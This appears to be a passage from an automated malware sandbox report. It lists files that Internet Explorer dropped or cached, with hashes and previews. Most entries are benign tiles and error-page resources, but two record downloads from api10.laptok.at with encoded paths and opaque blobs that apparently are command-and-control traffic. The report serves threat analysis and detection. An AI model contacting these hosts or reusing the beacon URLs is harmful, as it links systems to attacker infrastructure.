                                                                                                                                      SHA1:FE5A3DC46C2A5F559D395DF4A0E6D6140ED664E6
                                                                                                                                      SHA-256:8ADD093CCA9896A3CCD685494F209190B74DC4E66288CF2A2E2AE0E57D8C76D6
                                                                                                                                      SHA-512:63D1EF3DAC54A8D9D91E02C3DF271287DADD92828DD2BDCC28F52F4E3517F14F50462EDE89419D90D677606179E49F49D14D434AF7DE8DC9802D94F2CAADBB7A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):647
                                                                                                                                      Entropy (8bit):5.087026282289658
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxi0OpOX4nWimI002EtM3MHdNMNxi0OpOX4nWimI00Obd5EtMb:2d6Nxh4SZHKd6Nxh4SZ7Jjb
                                                                                                                                      MD5:E94C54A3D22944401298F92C5A9D0942
                                                                                                                                      SHA1:7F64BAAE56143B754270302263834AF185A92FBF
                                                                                                                                      SHA-256:620A689C180141218B225E5F23631CAD9435B50797B2D5CAC945AC1C4A404E29
                                                                                                                                      SHA-512:46E8F47A87D5F1275AF14672C277BE9D69870D55DC9DB5B458C324CFB9522A407A72DEA6608E1CFA8A61A8F6712A2B7916E9E0A7848CA04924AC1E9F54A9FE70
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):656
                                                                                                                                      Entropy (8bit):5.13628902919673
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxhGw02Tp2TX4nWimI002EtM3MHdNMNxhGw02Tp2TX4nWimI00Ob8K075t:2d6NxQP4SZHKd6NxQP4SZ7YKajb
                                                                                                                                      MD5:22A263B499DB5D19998731111CA9B90D
                                                                                                                                      SHA1:9EC32CAB0B18DC969117CE0D2F0D6363566E8565
                                                                                                                                      SHA-256:819997C6EE7A94F7A998BFC8DBA2FED8AF1B99F8A28627EFC98240852AF257B8
                                                                                                                                      SHA-512:968FC394F7C031CC69242270017636DE8273084EB7F7C0E330F35854BAD2D822472F0E94C255FD9E5A168805F55599668ADAB14E4FAF1BF677AC4FBA1E33D335
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):653
                                                                                                                                      Entropy (8bit):5.078062345810726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNx0n0KdWpKdWX4nWimI002EtM3MHdNMNx0n0KdWpKdWX4nWimI00ObxEty:2d6Nx0rfK4SZHKd6Nx0rfK4SZ7nb
                                                                                                                                      MD5:74D54AEF719C33D18E3B3ABB0CA5BAAC
                                                                                                                                      SHA1:A94F71BE8198C097B5E82DE0F1D3FD80A58CE94E
                                                                                                                                      SHA-256:3106D23C3F43BBE6E7303878930A376216223BA71FB35F303300D38CDEC888F2
                                                                                                                                      SHA-512:DD81C7461CE3FD8C7717E12132E790C26F8D9005E0AA2FAB0A69BC17A60B3E7889C2CF38779EBAE671EA708C4B9A122F92E1B2AF75685FDFABF4CE53D5303CE8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):656
                                                                                                                                      Entropy (8bit):5.115180936428906
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxx0OpOX4nWimI002EtM3MHdNMNxx0OpKdWX4nWimI00Ob6Kq5EtMb:2d6NxW4SZHKd6NxoK4SZ7ob
                                                                                                                                      MD5:663C96EF5063DF9CDE299E8DA5CBDBFF
                                                                                                                                      SHA1:38F6EA7AC5756E43A0815E73D3A0D423E6927C5D
                                                                                                                                      SHA-256:278F923B5FECB5C0405D1C6CEDC3BF5F5E73D21374EC8EB9D20683334295C3AD
                                                                                                                                      SHA-512:ABB0CDEA2F4E3C831A23745B711981E56F1036E50D7292BB22DF35ACE4EAA9125593E9EBF9268297B8EEFA95BE3EB805FBF1AC3A9161824F0D657F515C66C8C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):659
                                                                                                                                      Entropy (8bit):5.1243145832336445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxcsUxUX4nWimI002EtM3MHdNMNxcsUxUX4nWimI00ObVEtMb:2d6Nxv4SZHKd6Nxv4SZ7Db
                                                                                                                                      MD5:ED9176B3D75A7C27CB5763C41A1AE91D
                                                                                                                                      SHA1:D1EB120E09624DB29FD74251D32DA4392A1E7F5C
                                                                                                                                      SHA-256:D585B4EEF70FA5D1E181D5789B46113207663E3820ADBF83DC2ADA049AD642D0
                                                                                                                                      SHA-512:BD17014708F89A12410E90B0534A40A04719C2BC32738976BCC18EAAE2BD084177F44A8070829878BD0E7BD22A9EDC9B8625D87E2E9BE324B36C19DB8A5958AE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):653
                                                                                                                                      Entropy (8bit):5.072911264014693
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxfn0OpOX4nWimI002EtM3MHdNMNxfn0OpOX4nWimI00Obe5EtMb:2d6NxI4SZHKd6NxI4SZ7ijb
                                                                                                                                      MD5:0BAE92F55D07580AACAF7BB17C6423C7
                                                                                                                                      SHA1:0327680EBC8E79B6C957F3116FC9A8A33C5EC000
                                                                                                                                      SHA-256:ABB47EDD851CC71FB9D738D3B586FAE86FA4F430420874E1BD46D0B6481328DF
                                                                                                                                      SHA-512:A3F0F833843E1F5FF42019CDCBBA5870C0E52DB325DE3A7750AF2E1C36752EA7901E8B33C1BF77BEB096BB6E3CD376B1B4160557550F2F8AB93CC1A1A68610B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\c[1].htm
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2400
                                                                                                                                      Entropy (8bit):5.975522616591464
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:T2ECG/vT+XLMHbLRCI24UCknBdpK2jgPOKipWUlgrjDu5pODzMHxW:KECGT+XqLxwnBbK8WUlqqaHMHxW
                                                                                                                                      MD5:E69A66BA1BFF6972458D1BC41252EE98
                                                                                                                                      SHA1:262423E195EE52FE55A2FA3CCD97E9B6619117A5
                                                                                                                                      SHA-256:F1D70F929CDCB80F5CD8AAE9F8A41AB63FA171F224206A020596F73E88E384B2
                                                                                                                                      SHA-512:5EBDB4B48518CD539BE0ED3CC3EE25996D14A8E473DD0F0261439BF04F416902E6ACDA45E00DEF009CAD129EBC4EAD09A791357AACC3B829C4973080783BEEA7
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c
                                                                                                                                      Preview: DnobSCt1acMLFsADNayhTZdaOfIuV71NRKZHHWnAGjoBIui5QG57YKyKNVOyL+zVwyrVuY5JbkTcKoHdRv/9ePWkpxcJKYZgxcF0rwtfpRcD7pGcRemPj2cqe79rGwYYIMtAvaYU74+Vn9T8zJ6m7Z4B3FWxGP7uKILEfJ07sG9J8KJ2lHPgZO/wzeS/zePRIYrCT/y9LgGj2vBWJ3GUsl9HA86aiXB6KubePlvwVTXOhj5FtyPo5bIRdm+NRRe0lh0BZuKHprUEzv66hkW36EVlw653bE6CIWe1AQeoGH9xYtJVCNDk5f1jhZKYMeSNIsHWxtdSYXq6gimI48VGPYfb75q12pdqPATTaCwMOifpnH+DDgJN8tFby8y+on9NZMUrBKJzxzLPJxb5Dp4oNQhX4Xz1BOQfOA0QovUjfzgLZSdfDC9iCVURu3oFy3AlObvlokn26IOHTIaKH8JRyGu6UyxxlkTkeFb60ZQ0QDV7T5Tocg7JOmSC9k0+GFuaB2Vq0/sBR2KS07n58zJx/qhviv/dDJAMQ/KCx8uj0ziJ4QH4zOSt3IF4ldDKpyEIyJpZw5iUplcOhqk/20g0lcZk/aX9wV7Ul1ehExIs8aRpgOWJbEW5Anaqs1vuBDoV5VZhbiw/qJm9XZsM7FENPZIRi4L4N/3/qZxbQGGQRhCNRTju995dOkAHIcLBdSV8ZXt8gZHOaVht6KZs5pdBCYFcCkkWuB7mp3V/cpg40FIuPpAXlhl3A+YkgiPorTap/JRrLkF2PPLHaaEMg8tXNuDMWgTEQ98SxdMfv0ri4jDj/zG2E+anMa568WfVUYg+co4YF3trNY7+3kKKfTGSXitWdmo7oMHyKVVoKYAHqNQICJoYtdap67qE6WAAqktSKoRR+0/fdetpF6IylEoZoyY9mC7oCTwbWRUXzL7zINyxbW3oJnlQd5HGLVr8+0M4FnEVSO70ktdW0OFE7e4bFVTwjUuYY2A07QVrO96D
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):748
                                                                                                                                      Entropy (8bit):7.249606135668305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                      MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):4720
                                                                                                                                      Entropy (8bit):5.164796203267696
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                      Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2168
                                                                                                                                      Entropy (8bit):5.207912016937144
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                      MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                      SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                      SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                      SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                      Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):447
                                                                                                                                      Entropy (8bit):7.304718288205936
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                      MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                      SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                      SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                      SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\xxdXe7[1].htm
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):338016
                                                                                                                                      Entropy (8bit):5.999979867333796
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:h7OGXHIEr+zisK8tb3/VKph5ur8FlLivxSZXKoWEPws/2ImLLW4Ytb31Zmqq:N1iis338p6r8lLi5ScrUwwjsC4YtbFYV
                                                                                                                                      MD5:AB868B345CA418AA4FACC6D46BD38178
                                                                                                                                      SHA1:A0A4189DC35EF39534A2EE41980275348B7AA8EE
                                                                                                                                      SHA-256:DAA9372E5A21C9079A646855110C83154D77B5E6DF2F37E949EA8452ABC1EF27
                                                                                                                                      SHA-512:1AE9D9E1D1C2BB3972433EBCE0DB8CAEEDA67AA93D1C8F09452593D67E59936446486B47B0C0775DF26F484479EB79818FC1D05526C6556B132FACB08A2A9D9C
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7
                                                                                                                                      Preview: hfUxqII5Ucqr2j8G0pSsTUuRmxcFmoXcLmjRBGjBaQQjiDhA7mumvDgeD/0tofjz+W8FCeTcggnq2pG2/2dNgiJYlJW0RCu98vw8Djsgvml9iYg8qaAvHSJCZOSTOfUWEbxo+NpORUwIIznyDtzgZcwokYZzLi15HQOfj+1DZJ3R1ZFmPQvSQ4b++fE8BvPhiT+t1AwGGj5aXeZjPCtzot/33P+dl9duvr9qk16vXdWpTO9FBJKWhKFnm99hQtte5/A+WXyHIg6kH2fRPWkpAAeAjx6GTgrdqyJ5ta8I0Teer8YPp2JLzAz1CBTkRC7j2bRE4pDMpNpn7JOAACUG/6dZi5Yst1MW8DfBSF6VrUToD8ZRo25HLorSmnYnqFEtORzQr24udRjr6vNrEEDxhv1aKVDf8yflSZ708nHYqykcHeq76BV8yPDFpMXdDSs8dck4afi48/xE3PRUZLbrMUC4wao51w+iBr2rsoeZ8k0g+PpkJj4yw8c0Sf0n3T2B3HvSvFEKKIGAHb0pE4rOJA6dOR0cuDOwJFkIscNL7ADK+OjdgFpxAn157U7+IAB9LnyqsP6/mNDEXiSen3NFOwFnFU6hfeC+G48BfKnq/qvuvQIZ+0P+Px+2QfYAaN4XMdGG4GSbV1hcgcrYlmJinwCuwry7nqwOJJTMO6aG2akKHxmOqULD9g0jScx3WiO2T/Iu3MJzOPRYkMReKQTQS5z52ojXVb8vEhsQWrqP00AYUzz8Ohm33hI3Fus+CF8kbgpLSV4KHLmNrwGxMZGMT7b6p8ymYWB8Z9onfS3JhUwnKkRNa5uaBcpe/pel5XN55d85MgnQx/IJXCtj5/gbX6LjdyEaZDGXga1Il7Aq/73O0ADxir3dVXudlyrcl8VDWBGshmjMxLf9g7BphGB9Jv6r7vi+BLDeIaJ43iCMusF5WfEegCmtpXa8y6IVUuQT5dUKlWn40gwfaejEyaaP7aY6diF0/062DbkOLv2x
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):453
                                                                                                                                      Entropy (8bit):5.019973044227213
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                      MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                      SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                      SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                      SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                      Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):12105
                                                                                                                                      Entropy (8bit):5.451485481468043
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                      MD5:9234071287E637F85D721463C488704C
                                                                                                                                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
